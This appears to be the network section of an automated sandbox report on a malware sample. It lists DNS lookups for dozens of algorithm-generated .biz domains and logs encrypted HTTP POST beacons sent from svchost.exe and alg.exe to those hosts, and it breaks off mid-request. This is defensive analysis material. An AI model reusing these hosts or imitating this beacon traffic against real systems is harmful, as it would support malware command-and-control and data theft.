                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.807996988 CEST1.1.1.1192.168.2.40x8d5No error (0)tltxn.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.308206081 CEST1.1.1.1192.168.2.40x4a03No error (0)vgypotwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.171786070 CEST1.1.1.1192.168.2.40x7011No error (0)giliplg.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.718128920 CEST1.1.1.1192.168.2.40xfaabNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.802808046 CEST1.1.1.1192.168.2.40xf01fNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.384229898 CEST1.1.1.1192.168.2.40xc8e1No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.384305000 CEST1.1.1.1192.168.2.40xc8e1No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.744889975 CEST1.1.1.1192.168.2.40x575fNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.412753105 CEST1.1.1.1192.168.2.40xf935No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.412753105 CEST1.1.1.1192.168.2.40xf935No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.419359922 CEST1.1.1.1192.168.2.40xe0a9Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.429784060 CEST1.1.1.1192.168.2.40xa782No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.785809040 CEST1.1.1.1192.168.2.40x5f1Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.795036077 CEST1.1.1.1192.168.2.40x84f6Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.806251049 CEST1.1.1.1192.168.2.40x3f82No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:10.420854092 CEST1.1.1.1192.168.2.40x6bbfNo error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:23.113141060 CEST1.1.1.1192.168.2.40xc7c1No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:35.811852932 CEST1.1.1.1192.168.2.40x5d7fNo error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:37.154448032 CEST1.1.1.1192.168.2.40xe42fNo error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:39.761208057 CEST1.1.1.1192.168.2.40xac7fNo error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.341305971 CEST1.1.1.1192.168.2.40x79daNo error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.707365036 CEST1.1.1.1192.168.2.40x63c5No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.707365036 CEST1.1.1.1192.168.2.40x63c5No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.911767960 CEST1.1.1.1192.168.2.40xac14No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.912312984 CEST1.1.1.1192.168.2.40xac14No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.683409929 CEST1.1.1.1192.168.2.40x1cedNo error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.198812962 CEST1.1.1.1192.168.2.40x6d2bNo error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.838720083 CEST1.1.1.1192.168.2.40xd64No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.196471930 CEST1.1.1.1192.168.2.40x3a83No error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.895880938 CEST1.1.1.1192.168.2.40xdf0cNo error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.642970085 CEST1.1.1.1192.168.2.40xafd6No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.482764006 CEST1.1.1.1192.168.2.40xc8d6No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.482780933 CEST1.1.1.1192.168.2.40xc8d6No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.987709999 CEST1.1.1.1192.168.2.40xc76dNo error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.987709999 CEST1.1.1.1192.168.2.40xc76dNo error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.054546118 CEST1.1.1.1192.168.2.40x91fcNo error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.156081915 CEST1.1.1.1192.168.2.40xe9aNo error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:52.185369015 CEST1.1.1.1192.168.2.40x74cdNo error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:53.266381025 CEST1.1.1.1192.168.2.40x5f0No error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:54.075490952 CEST1.1.1.1192.168.2.40x8482No error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:55.773689985 CEST1.1.1.1192.168.2.40x93ecNo error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.310333014 CEST1.1.1.1192.168.2.40xf9No error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.826214075 CEST1.1.1.1192.168.2.40xb603No error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:05.992681026 CEST1.1.1.1192.168.2.40xc08eNo error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:05.992773056 CEST1.1.1.1192.168.2.40xc08eNo error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                                                                                                                                              • pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • banwyw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • zrlssa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • jlqltsjvh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • xyrgy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • kvbjaur.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • uphca.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • fjumtfnz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • hlzfuyy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • rffxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • cikivjto.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • qncdaagct.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • shpwbsrw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • cjvgcl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • neazudmrq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • pgfsvwx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • aatcwo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • kcyvxytog.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • nwdnxrd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ereplfx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ptrim.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • znwbniskf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • cpclnad.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • mjheo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • wluwplyh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • zgapiej.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • jifai.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • xnxvnn.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ihcnogskt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • kkqypycm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • uevrpr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • fgajqjyhr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • hagujcj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • sctmku.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • qcrsp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • sewlqwcd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • dyjdrp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • napws.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • qvuhsaqa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • apzzls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • krnsmlmvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • nlscndwp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • bzkysubds.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ltpqsnu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • vnvbt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ypituyqsq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ijnmvqa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • tltxn.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • vgypotwp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • giliplg.biz

                                                                                                                                                                                                                                                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              0192.168.2.44973154.244.188.177804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:56.446223974 CEST360OUTPOST /bvjounbjkagqnta HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:56.446223974 CEST786OUTData Raw: ae 46 06 5e fe d4 1d 0f 06 03 00 00 11 3b 4e f2 93 fa 23 1c 0f ff 27 56 c5 e9 a4 8c b5 d0 1a 0d b8 84 cd b7 48 c6 0e 5e b6 7b ab 84 ef f8 bb 80 b1 c1 69 58 c5 59 91 df 9b 56 5e 4c 3a 06 bc 65 86 21 ec 22 eb 4e f9 21 41 90 b7 d9 ba d2 0c c9 a4 9f
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: F^;N#'VH^{iXYV^L:e!"N!AXr<;-TzO<aB>P($Oxa&%"*>sSCxIwHu*rn!WN*?i[(}DV6|20Sf1v}Wn
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:57.180274963 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:27:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=4c67fe4f5f90402ab5e6aebac2a0db0c|8.46.123.33|1728394077|1728394077|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              1192.168.2.44973218.141.10.107804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:57.244077921 CEST357OUTPOST /rsmfnaxurgxpde HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:57.244093895 CEST786OUTData Raw: 3e a6 74 26 32 59 f3 28 06 03 00 00 3a 96 91 74 ca 48 14 dd fd 57 bb fe c0 ab d6 b8 c6 01 d8 0c 0b c1 6e 9f ca 1a ea f8 33 a2 98 28 b2 4a 31 db 9e 6e 54 e9 47 53 2c cd 8a 55 48 67 38 96 61 79 cd f0 a8 35 76 1e 0f 9a 7a 3f a4 11 80 03 9a f0 98 90
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: >t&2Y(:tHWn3(J1nTGS,UHg8ay5vz?P*Yc)C>Os0;9ni%9z//HhVqkJjqR5Z`HHp~<kf2jZ^e6B>(Y+?LXX_4u9H5l&62qK}t
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:58.605746984 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:27:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=c4a12f7ffbf31ea9f1ae735db3b37b0c|8.46.123.33|1728394078|1728394078|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              2192.168.2.44973454.244.188.177802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:58.674415112 CEST357OUTPOST /dqlfliuucamv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:58.674439907 CEST778OUTData Raw: 65 f9 60 f6 44 d4 ab c5 fe 02 00 00 82 71 fd d8 e6 a2 86 96 38 67 10 f6 87 69 a9 0c a1 cc 6c d2 c3 59 c3 3f 86 bf 47 3f 9e 4e 52 2b 9d a3 dc c6 94 31 11 66 da 57 d3 e4 42 97 49 62 8a e6 51 d7 3f c0 de ed c2 c5 65 9b 8f a1 0a e6 29 ed b1 9f f5 39
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: e`Dq8gilY?G?NR+1fWBIbQ?e)9r!WD@/COJQ!h'_\Qg=-ww~P],VW$@j{YN;;U:2gjr.a5!M^~{MEMY
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:58.910633087 CEST1135OUTPOST /dqlfliuucamv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 65 f9 60 f6 44 d4 ab c5 fe 02 00 00 82 71 fd d8 e6 a2 86 96 38 67 10 f6 87 69 a9 0c a1 cc 6c d2 c3 59 c3 3f 86 bf 47 3f 9e 4e 52 2b 9d a3 dc c6 94 31 11 66 da 57 d3 e4 42 97 49 62 8a e6 51 d7 3f c0 de ed c2 c5 65 9b 8f a1 0a e6 29 ed b1 9f f5 39 92 a3 10 ff bf 0a 1f 72 21 0d dc 83 57 8e ba c6 ad d3 ef f4 44 07 cf 0c 40 ab e8 15 2f d1 a4 b3 43 4f 4a 51 21 8c 68 e2 27 d4 5f d1 5c 1e fa 51 d5 c3 67 c9 3d d1 14 03 e5 2d 1b 16 77 e3 ab 77 1e 7e ce 50 5d 85 0f 13 a7 b6 e9 df cc d8 9e 04 2c 56 57 bd f3 24 15 d9 89 40 ca 6a a6 c9 07 e8 9b 7b 59 e6 18 4e 3b 3b 82 f7 eb 9b f3 55 3a 9b af d6 8b 9c 32 c7 17 c5 d6 8c 67 07 7f 6a cc 72 2e d8 b7 99 61 a2 0c 87 ef 35 8d 21 b3 4d 5e 7e a3 81 d4 7b 4d cc 05 8a 45 9e c9 80 4d 17 d9 a6 59 11 4d 07 1e 21 10 d5 1d dc cd 0a a2 14 f0 5f fa ea 75 d4 1e 79 1a 18 87 4e 1e 33 18 f2 e1 30 8c e2 bb e8 9b d6 20 0e 5f 94 b9 10 e8 f4 bb 15 04 00 b8 5f 51 1a c9 64 ef 9c 0c a2 95 9b 7e 54 fa 7e 9f 4b ff 19 0e cd 8a ed fb 99 e7 c5 ee 57 b5 c7 2c c0 97 2e 97 3c 83 99 31 72 ba 65 96 36 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: e`Dq8gilY?G?NR+1fWBIbQ?e)9r!WD@/COJQ!h'_\Qg=-ww~P],VW$@j{YN;;U:2gjr.a5!M^~{MEMYM!_uyN30 __Qd~T~KW,.<1re6W)F-ue{C~h{@3xV~x2Sc.L{#Sr7dh$&5)b<ng@P'q T=Q!]cH5TFhvUOZIM '9IaOkW&\u7 |+?+#Y|2,uAuo#Z<6xuk4KM%769]@4D:/~s,T6@NTc2l<:@j u#8PCTIuP}Or 8E1~_34@E4$4\G}f
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:59.223054886 CEST1135OUTPOST /dqlfliuucamv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
